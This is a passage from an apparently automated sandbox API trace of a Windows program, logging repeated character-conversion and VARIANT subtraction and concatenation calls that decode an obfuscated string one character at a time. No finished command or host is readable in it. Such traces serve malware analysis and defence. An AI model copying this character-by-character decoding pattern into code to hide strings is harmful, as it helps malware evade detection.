lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.992] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0172.992] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.993] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0172.993] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.994] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.995] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.995] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.996] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.997] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0172.997] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.998] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.998] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.999] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0172.999] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.000] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.000] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.001] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.002] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.002] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.003] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.004] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.005] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.005] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0173.006] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.007] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0173.007] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.008] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0173.008] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.009] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0173.009] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.010] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.010] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.011] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0173.012] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.013] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0173.013] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.014] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0173.014] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.015] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0173.016] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.017] VarSub (in: pvarLeft=0x28f8b0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.017] VarCat (in: pvarLeft=0x28f7f0, pvarRight=0x28f910, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.019] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0173.019] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.088] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.089] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.089] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1168614, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0173.090] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.091] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0173.091] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.092] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0173.092] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.093] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1168614, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.093] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.094] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.094] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.095] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0173.095] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.096] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1168614, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0173.096] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.097] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0173.097] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.098] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0173.099] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.101] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x1168614, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0173.101] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=">", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=">\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.102] VarSub (in: pvarLeft=0x28f8c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x11685ec, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0173.102] VarCat (in: pvarLeft=0x28f850, pvarRight=0x28f9a0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.103] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0173.104] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.104] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0173.105] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, 